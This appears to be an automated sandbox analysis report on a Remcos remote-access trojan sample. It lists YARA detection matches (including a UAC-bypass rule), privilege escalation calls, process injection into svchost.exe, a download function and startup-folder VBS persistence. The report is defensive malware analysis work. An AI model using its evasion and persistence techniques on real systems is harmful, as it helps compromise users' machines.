                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: jv4ri.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9930708547993492
                  Source: name.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9930708547993492
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@16/22@0/1
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDA2D5 GetLastError,FormatMessageW,0_2_00CDA2D5
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC8713 AdjustTokenPrivileges,CloseHandle,0_2_00CC8713
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00CC8CC3
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00078713 AdjustTokenPrivileges,CloseHandle,2_2_00078713
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00078CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00078CC3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_0041798D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_0041798D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00CDB59E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CEF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00CEF121
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C74FE9 FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C74FE9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0041AADB
                  Source: C:\Users\user\Desktop\jv4ri.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3712
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-S3AD48
                  Source: C:\Users\user\Desktop\jv4ri.exeFile created: C:\Users\user\AppData\Local\Temp\aut4DA0.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: jv4ri.exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\Desktop\jv4ri.exeFile read: C:\Users\user\Desktop\jv4ri.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\jv4ri.exe "C:\Users\user\Desktop\jv4ri.exe"
                  Source: C:\Users\user\Desktop\jv4ri.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\jv4ri.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jv4ri.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 736
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 784
                  Source: C:\Users\user\Desktop\jv4ri.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\jv4ri.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jv4ri.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
                  Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2039035690.0000000004000000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2039157753.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2052777335.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2053042365.0000000003730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2179689028.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2180712436.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2039035690.0000000004000000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2039157753.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2052777335.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2053042365.0000000003730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2179689028.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2180712436.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00DBC0B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00DBC0B0
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CC0181 pushfd ; retf 0_2_00CC0195
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CC019E pushfd ; retf 0_2_00CC01A5
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CC01AE pushfd ; retf 0_2_00CC01B1
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CC01A6 pushfd ; retf 0_2_00CC01AD
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CC02AB push FFFFFFC0h; retf 0_2_00CC02AD
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7C946 push ds; retf 0_2_00C7C949
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7C94C push ds; retf 0_2_00C7C94D
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7C950 push ds; retf 0_2_00C7C951
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7C927 push ds; retf 0_2_00C7C929
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7C937 push ds; retf 0_2_00C7C93D
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7C934 push ds; retf 0_2_00C7C935
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7C93F push ds; retf 0_2_00C7C945
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C80A68 push eax; retf 0_2_00C80A69
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C80A64 push eax; retf 0_2_00C80A65
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C80A3B push eax; retf 0_2_00C80A41
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C98B85 push ecx; ret 0_2_00C98B98
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7B740 push es; retf 0_2_00C7B75A
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7B88B push cs; retf 0_2_00C7B892
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7B889 push cs; retf 0_2_00C7B88A
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7B894 push cs; retf 0_2_00C7B89A
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFF848 pushfd ; iretd 0_2_00CFF84E
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7B83B push cs; retf 0_2_00C7B872
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CB1A9A push ss; retf 0_2_00CB1A9C
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CB1A9D push ss; retf 0_2_00CB1AA0
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CB1AA2 push ss; retf 0_2_00CB1AAC
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_0002C590 push eax; retn 0002h 2_2_0002C599
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00048B85 push ecx; ret 2_2_00048B98
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000AF84D pushfd ; iretd 2_2_000AF84E
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00457186 push ecx; ret 5_2_00457199
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0045E55D push esi; ret 5_2_0045E566
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00457AA8 push eax; ret 5_2_00457AC6
                  Source: initial sample Static PE information: section name: UPX0
                  Source: initial sample Static PE information: section name: UPX1
                  Source: initial sample Static PE information: section name: UPX0
                  Source: initial sample Static PE information: section name: UPX1
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00406EEB ShellExecuteW,URLDownloadToFileW,5_2_00406EEB
                  Source: C:\Users\user\Desktop\jv4ri.exe File created: C:\Users\user\AppData\Local\directory\name.exe

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                  Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                  Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
